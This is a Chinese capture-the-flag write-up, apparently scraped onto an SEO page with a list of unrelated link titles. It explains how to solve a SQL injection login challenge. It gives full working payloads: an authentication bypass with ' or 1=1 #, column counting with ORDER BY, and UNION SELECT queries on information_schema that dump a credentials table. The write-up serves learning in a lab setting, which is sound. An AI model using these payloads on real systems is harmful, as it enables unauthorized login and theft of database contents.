当前位置: 首页 > news >正文

做网站需准备些什么问题搜索引擎优化的核心及内容

做网站需准备些什么问题,搜索引擎优化的核心及内容,wordpress 腾讯云短信,上海建筑工程网站一、题目简介: 二、通关思路: 1、首先查看页面源代码: 我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。 2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。 username: 1 or 11…

一、题目简介

二、通关思路

1、首先查看页面源代码:

我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。

2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。

username: 1' or 1=1 #
password: 随便写任意值

提交submit,发现可以登录:

 并在 Your password 处发现一段乱码,疑似为flag,提交发现错误,这并不是flag,说明flag在别处。

3、通过万能密码已知,注入类型为 字符型,闭合方式为 单引号闭合,尝试查看字段数量。

当 order by 3 时,页面显示如图:

当 order by 4 时,页面显示如图:

Unknown column 4,说明页面报错了,说明字段数为3。

注:这里#使用URL编码格式:% + 十六进制数,目的是防止被过滤,在本题目中若使用 # 或 --+是无法检测出字段数量的,所以在以后的sql注入题目中,最好使用%23。

4、查看回显:

1' union select 1,2,3 %23

 

5、发现回显位 ,开始注出数据库库名,表名,列明,最终拿到flag。

注出库名:
1' union select 1,2,database() %23

 

注出表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) %23

 

注出列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') %23

 

 

拿到flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23

 

成功拿到flag,通关。

http://www.yidumall.com/news/44399.html

相关文章:

  • 如何做测评视频网站网站建站系统
  • 互联网推广营销隐迅推认定seo优化网站排名
  • 网站标题如何写店铺推广软文500字
  • 公司网站建设多少钱南京市网站seo整站优化
  • seo网站推广策略西安百度推广优化
  • qq钓鱼网站在线生成器怎么制作一个网站首页
  • 知名网站制作公司有哪些热点新闻事件及观点
  • wordpress首页文章摘要关键词优化seo外包
  • 免费做直播网站seo是什么意思如何实现
  • 做博客网站需要工具吗如何优化推广中的关键词
  • 网站为什么吸引人明星百度指数排行
  • 淘客网站推广免备案网络关键词
  • 杭州网站制上海aso
  • 攀枝花做网站百度用户服务中心电话
  • 李氏牛仔网站建设风网站怎么做收录
  • 南阳那里有做网站的谷歌seo
  • 武汉公司名称大全优化快速排名公司
  • seo网站建设刘贺稳营销专家a温州seo优化
  • 怎样清除单位域名 网站或互联网网址自动点击器安卓
  • 只做传统嫁衣网站站长工具排名分析
  • 普通网站可以做商城关键词分为哪三类
  • wordpress多语言企业网站网络营销推广方案
  • 网站点击排名做网站哪家好
  • 石家庄企业网站建设数据分析网站
  • 深圳住房和城乡建设厅网站万网域名查询接口
  • web网站建设一题库成都私人做网站建设
  • 陕西宝鸡网站建设短期职业技能培训班
  • 网站基础服务客户关系管理
  • 昆明做网站外包网络宣传方式有哪些
  • 济南做网站互联网公司排名如何做好推广引流